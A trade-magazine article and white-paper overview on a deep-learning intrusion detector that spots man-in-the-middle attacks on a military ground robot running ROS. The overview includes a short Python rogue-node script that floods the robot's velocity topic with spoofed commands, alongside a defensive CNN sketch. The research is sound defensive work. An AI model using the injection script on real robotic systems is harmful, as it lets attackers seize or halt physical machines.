New Cyber Algorithm Shuts Down Malicious Robotic Attacks

Safe and secure operation of robotic systems is of paramount importance. To achieve trusted operation of a military robotic vehicle in contested environments, researchers have introduced a new cyber-physical system based on deep learning convolutional neural networks (CNNs).

The GVR-BOT used in the experiment by UniSA and Charles Sturt AI researchers. (Image: UniSA.)

Australian researchers have designed an algorithm that can intercept a man-in-the-middle (MitM) cyberattack on an unmanned military robot and shut it down in seconds.

In an experiment, artificial intelligence experts from Charles Sturt University and the University of South Australia (UniSA) used deep learning neural networks, which simulate the behavior of the human brain, to train the robot’s operating system to learn the signature of a MitM eavesdropping cyberattack, in which attackers interrupt an existing conversation or data transfer.

Tested in real time on a replica of a U.S. Army combat ground vehicle, the algorithm was 99 percent successful in preventing malicious attacks, with a false-positive rate of less than 2 percent validating the system’s effectiveness.

The results have been published in IEEE Transactions on Dependable and Secure Computing.

UniSA autonomous systems researcher, Professor Anthony Finn, says the proposed algorithm performs better than other recognition techniques used around the world to detect cyberattacks.

Professor Finn and Dr. Fendy Santoso from Charles Sturt Artificial Intelligence and Cyber Futures Institute collaborated with the U.S. Army Futures Command to replicate a man-in-the-middle cyberattack on a GVR-BOT ground vehicle and trained its operating system to recognize an attack.

“The robot operating system (ROS) is extremely susceptible to data breaches and electronic hijacking because it is so highly networked,” Professor Finn says.

“The advent of Industry 4.0, marked by the evolution of robotics, automation, and the Internet of Things, has demanded that robots work collaboratively, where sensors, actuators, and controllers need to communicate and exchange information with one another via cloud services.

“The downside of this is that it makes them highly vulnerable to cyberattacks.

“The good news, however, is that the speed of computing doubles every couple of years, and it is now possible to develop and implement sophisticated AI algorithms to guard systems against digital attacks.”

Dr. Santoso says that despite its tremendous benefits and widespread usage, the robot operating system largely ignores security issues in its coding scheme, owing to its unencrypted network traffic and limited integrity-checking capability.

“Owing to the benefits of deep learning, our intrusion detection framework is robust and highly accurate,” Dr. Santoso says. “The system can handle the large datasets needed to safeguard large-scale, real-time data-driven systems such as ROS.”

Professor Finn and Dr. Santoso plan to test their intrusion detection algorithm on different robotic platforms, such as drones, whose dynamics are faster and more complex than those of a ground robot.

This work was performed by Anthony Finn and Fendy Santoso for the Defence and Systems Institute (DASI), University of South Australia (Adelaide, Australia). For more information, download the Technical Support Package (free white paper) below. TSP-04244



This Brief includes a Technical Support Package (TSP).
Trusted Operations of a Military Ground Robot in the Face of Man-in-the-Middle Cyberattacks Using Deep Learning Convolutional Neural Networks: Real-Time Experimental Outcomes (reference TSP-04244) is currently available for download from the TSP library.


This article first appeared in the April 2024 issue of Aerospace & Defense Technology Magazine (Vol. 9 No. 2).



Overview

The document discusses research focused on enhancing the cybersecurity of unmanned ground vehicles (UGVs), specifically targeting vulnerabilities within the Robot Operating System (ROS). The study highlights the risks posed by cyberattacks, particularly man-in-the-middle attacks, which can compromise the control and operation of robotic systems.

The research utilizes a ground robot, the GVR-BOT, to conduct real-time penetration testing, simulating cyberattacks to assess the system's vulnerabilities. The findings reveal that during a cyberattack, the robot becomes unresponsive to legitimate command signals, as the guidance data is overwritten by malicious traffic. This scenario illustrates how attackers can manipulate the system's trajectory by injecting false data, rendering the robot "blind" to its intended commands.
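To make the injection mechanism concrete, here is a minimal sketch of a rogue ROS 1 publisher; the /cmd_vel topic name, Twist message type, and 50 Hz rate are illustrative assumptions rather than details from the study.

```python
# Illustrative sketch only (not the authors' test harness). ROS 1 performs
# no authentication or integrity checking, so any node on the network can
# register as a publisher on a command topic. The topic name /cmd_vel, the
# Twist message type, and the 50 Hz rate are assumptions for illustration.
import rospy
from geometry_msgs.msg import Twist

def rogue_publisher():
    rospy.init_node("rogue_commander", anonymous=True)
    pub = rospy.Publisher("/cmd_vel", Twist, queue_size=10)
    rate = rospy.Rate(50)  # publish faster than the legitimate controller
    spoof = Twist()        # zeroed velocities: false guidance that halts the robot
    while not rospy.is_shutdown():
        pub.publish(spoof)  # spoofed traffic drowns out legitimate commands
        rate.sleep()

if __name__ == "__main__":
    rogue_publisher()
```

Because a motion controller typically acts on the most recently received message, a rogue node publishing at a higher rate than the legitimate controller effectively overrides the operator's commands.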

To address these vulnerabilities, the researchers developed a convolutional neural network (CNN) designed to detect cyberattacks by analyzing ROS network traffic data. The data collected during both legitimate operations and attacks were transformed into images (grayscale or RGB) to train the CNN, enabling it to learn the signatures of various attacks. The study emphasizes the importance of real-time detection capabilities to mitigate risks associated with cyber threats.
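As a rough sketch of that image-based detection idea (not the authors' published architecture), the Python example below encodes a fixed-size window of captured traffic bytes as a 32 x 32 grayscale image and classifies it with a small CNN; the window size, image dimensions, layer shapes, and byte encoding are all illustrative assumptions.

```python
# Minimal sketch of image-based traffic classification with a CNN.
# Assumptions (not from the paper): 32x32 grayscale encoding of raw byte
# windows, two conv layers, binary legitimate-vs-attack output.
import torch
import torch.nn as nn

def bytes_to_image(window: bytes, side: int = 32) -> torch.Tensor:
    """Map a window of captured traffic bytes to a normalized grayscale
    image tensor of shape (1, side, side)."""
    buf = window[: side * side].ljust(side * side, b"\x00")  # truncate or pad
    img = torch.tensor(list(buf), dtype=torch.float32) / 255.0
    return img.view(1, side, side)

class TrafficCNN(nn.Module):
    """Binary classifier: legitimate vs. attack traffic images."""
    def __init__(self):
        super().__init__()
        self.features = nn.Sequential(
            nn.Conv2d(1, 16, 3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
            nn.Conv2d(16, 32, 3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
        )
        self.classifier = nn.Linear(32 * 8 * 8, 2)  # 32x32 input -> 8x8 maps

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return self.classifier(self.features(x).flatten(1))

# Example: score one captured window (unsqueeze adds the batch dimension).
model = TrafficCNN()
logits = model(bytes_to_image(b"\x10\x32" * 600).unsqueeze(0))
is_attack = logits.argmax(dim=1).item() == 1
```

In practice, one class of training images would come from clean operation and the other from staged attacks, so the network learns each attack's visual signature.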

The document also outlines the hardware configuration of the GVR-BOT, which includes an Intel Atom processor, a Wi-Fi communication system, and optional GPS capability. The robot is designed for both indoor and outdoor environments and is capable of performing various motions, which adds complexity to its operational context.

In addition to the technical aspects, the research discusses the broader implications of trust in robotic systems, emphasizing that despite the best efforts to ensure dependability, there are inherent risks when delegating tasks to autonomous agents. The study is supported by various military and academic institutions, highlighting its relevance to defense applications.

Overall, the document presents a comprehensive approach to improving the security of robotic systems through advanced machine learning techniques, aiming to create a safer operational environment for UGVs in contested scenarios. The findings contribute to the ongoing discourse on trusted autonomy and the need for robust cybersecurity measures in robotics.